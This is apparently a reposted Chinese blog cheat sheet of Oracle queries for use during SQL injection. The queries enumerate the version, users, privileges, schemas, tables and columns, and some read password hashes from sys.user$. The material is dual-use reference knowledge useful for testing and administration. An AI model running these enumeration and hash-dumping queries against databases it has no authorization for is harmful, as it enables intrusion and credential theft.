Oracle SQL注入常用语句
解析IP
select utl_inaddr.get_host_address('google.com') from dual;
获取本机IP地址
select utl_inaddr.get_host_address from dual;
根据IP地址反向解析主机名
select utl_inaddr.get_host_name('10.80.18.241') from dual;
-- list version
select banner from v$version where rownum=1 ; -- oracle version
-- list user
select user from dual; -- current user
select username from user_users; -- current user
select username from all_users; -- all user , the current user can see...
select username from dba_users; -- all user , need pris
-- list role
select role from session_roles; -- current role
-- list privs
select privilege from user_sys_privs; -- privs the current user has
select privilege from role_sys_privs; -- privs the current role has
select privilege from session_privs; -- the all privs that current user has = user_sys_privs + role_sys_privs
select * from dba_sys_privs; -- all user's privs , need privs
-- list password hash
select name, password, astatus from sys.user$; -- password hash <=10g , need privs
select name, password, spare4 from sys.user$; -- password has 11g , need privs
-- list database
select global_name from global_name; -- current database
select sys.database_name from dual; -- current database
select name from v$database; -- current database name , need privs
select instance_name from v$instance; -- current database name , need privs
-- list schemas
select distinct owner from all_tables; -- all schema
-- list tables
select table_name from all_tables where owner='xxx'; -- all table name
-- list columns
select owner,table_name,column_name from all_tab_columns where table_name='xxx';
select owner,table_name,column_name from all_tab_cols where table_name='xxx';
转载于:https://blog.51cto.com/duallay/2050094
Oracle SQL注入常用语句相关推荐
- 【白帽子学习笔记14】SQL注入常用语句
[白帽子学习笔记14]SQL注入常用语句 目前网站中使用的最多的数据库要算是 ACCESS.SQL Server(MSSQL).MySQL 这三个了,所以这里的手工注入,我就以他们三个数据库来分成三 ...
- oracle向前推一个小时,oracle SQL里常用的时间函数,经典推荐
oracle SQL里常用的时间函数,经典推荐 (2009-03-11 23:16:54) 标签: 杂谈 常用日期型函数 1.Sysdate 当前日期和时间 SQL> Select sysdat ...
- 【SQL注入】手工注入常用语句合集
直接就能用的常用语句 一.注入前的准备:爆闭合 0x1 整形的闭合 SELECT * FROM users WHERE id=$id LIMIT 0,1?id=3 #用户输入 3 ?id=3 -- - ...
- SQL注入-常用函数和语句
文章目录 前言 0x01 常用函数 0x02 常用语句 总结 前言 SQL的函数很多,这里简单介绍一下在SQL注入中比较常用到的一些函数,如果你SQL学的不是很好,又想练一练SQL手工注入的话,可以优 ...
- 二、oracle sql*plus常用命令
一.sys用户和system用户 Oracle安装会自动的生成sys用户和system用户 (1).sys用户是超级用户,具有最高权限,具有sysdba角色,有create database的权限,该 ...
- MySQL 手工注入常用语句
判断是否存在SQL注入 ' and 1=1 and 1=2 暴字段长度 Order by 数字 匹配字段 and 1=1 union select 1,2,..,n 暴字段位置 and 1=2 uni ...
- oracle运维常用语句,oracle运维个人常用检查语句整理
1.查找排序最多的SQL SQL> SELECT HASH_VALUE, SQL_TEXT, SORTS, EXECUTIONS FROM V$SQLAREA ORDER BY SORTS DE ...
- oracle sql 分区查询语句_ORALCE常识及SQL基本语法
第一章 ORALCE常识 及 SQL 基本语法 1,ORACLE安装完成后的初始口令? internal/oracle sys/change_on_install system/manager sco ...
- oracle sql循环判断语句怎么写,Oracle 非常详细的 PL/SQL入门教程,PL/SQL语法格式/循环语句/条件判断/异常处理...
PL/SQL入门教程目录 Oracle PL/SQL入门教程,PL/SQL语法格式/循环语句/条件判断/异常处理 一.PL/SQL简介 1.PL/SQL简介 1.PL/SQl是过程语言PL与结构化语言 ...
最新文章
- 中间层通讯 Socket? Remoting? WCF?
- Shell(8)——for、while、until
- linux卸载模块驱动程序,Linux设备驱动程序 之 装载和卸载模块
- 10个优秀的 Web UI 库/框架
- HDU 2089 不要62
- 使用npm失败解决方案
- CentOS 7使用通过二进制包安装MySQL 5.7.18
- vi/vim文本编辑器的使用
- authorize.AuthorizationException: User: livy is not allowed to impersonate
- 计算机学报在线阅读,ei收录的计算机类核心源:计算机研究与发展计算机学报软件.doc...
- 浏览器如何工作(How browsers work)
- 用批处理文件替换或删除文件名中的字符
- Python学习 Day38 jQuery常用方法03
- 怎样让一个正常人理解“线性代数”
- 跳槽、换房、不忘输出,与你分享我匆忙的 2022~
- 整数拆分为连续自然数之和
- Windows PC上创建大数据职业技能竞赛实验环境之五--hadoop、hive和spark编程
- 一位计算机硕士毕业生三个月求职经历与经验的结晶
- selenium——浏览器插件
- 虾米音乐Qt版下载器之Location解密部分
热门文章
- django配置邮件服务器,python – 使用Bluehost电子邮件服务器的Django电子邮件配置...
- 小米笔记本bios版本大全_初级用户应该学习的BIOS知识
- python3 性能提升_5个提升Python性能的项目
- mysql 查询一个数据库里面有多少张数据表
- 使用minio搭建文件服务器,MinIO文件服务器构建
- 商超小程序服务器配置,超市商超小程序在线开店的教程
- 计算机图形学绘制图形的过程,计算机图形学13_图形绘制流水线的实现.pdf
- python中将str转成数字_python初探: 数据类型与变量
- 获取当前html的名字,c#获取当前页面名字
- 电脑版微信怎么看朋友圈_电脑上也可以看朋友圈,99%的人都不知道!